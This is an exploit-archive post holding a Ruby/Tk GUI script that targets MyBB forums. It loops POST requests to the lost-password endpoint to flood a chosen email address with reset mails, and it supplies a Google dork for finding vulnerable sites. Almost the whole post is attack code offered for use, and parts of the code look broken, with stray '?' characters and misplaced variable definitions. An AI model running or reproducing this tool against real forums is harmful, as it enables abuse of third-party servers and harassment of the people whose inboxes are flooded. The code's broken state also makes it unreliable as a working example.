GUI MyBB 2002-2010 exploit

==========================
GUI MyBB 2002-2010 exploit
==========================

#!/usr/local/bin/ruby
# GUI MyBB 2002-2010
# 04/04/10
# Whivack
# Contact Me = [email protected]
# Dork Google : "Moteur MyBB, 2002-2010 MyBB Group."
# No Security : No Captcha
# POST_Form Method : "email" and "action"
# It to serve freight forwarding of the customer in their insus
# Version 2.0
# XP/Vista, Ubuntu
# Webapps
# Software Necessary ; Ruby 1.8.6 and ActiveTCL 8.4


require 'tk'
require 'net/http'
require 'uri'

ens = TkRoot.new {
? title "Code By, Whivack"
}
frame = TkFrame.new( ens ) {
width 50
height 30
pack
}
label = TkLabel.new( frame ) {
? text "MyBB 2002-2010 Exploit"
? pack( { 'padx' => 10, 'pady' => 10 } )
}
label2 = TkLabel.new( frame ) {
? text "Website"
? pack( { 'padx' => 10, 'pady' => 10 } )
}
entrysite = TkEntry.new( frame ) {
pack( { "side" => "top" } )
}
label3 = TkLabel.new( frame ) {
? text "E-Mail"
? pack( { 'padx' => 10, 'pady' => 10 } )
}
entryemail = TkEntry.new( frame ) {
pack( { "side" => "top" } )
}
start = TkButton.new( ens ) {
text "Start"
pack( { "side" => "bottom" } )
}
var = TkVariable.new
var.value =? 30
scale = TkScale.new( ens ) {
from 10
to 100
orient 'horizontal'
label 'Send'
variable var
site = TkVariable.new
email = TkVariable.new
entrysite.textvariable = site
entryemail.textvariable = email
start.bind( "1", proc {
comp = 0
while comp < var
attack = Net::HTTP.post_form( URI.parse("http://#{site}/forum/member.php?action=lostpw"),
{'email'=> email, 'action'=>'do_lostpw'})
comp += 1
end
}
)
}
scale.pack
ens.mainloop
Tk.mainloop



#  0day.today [2018-03-13]  #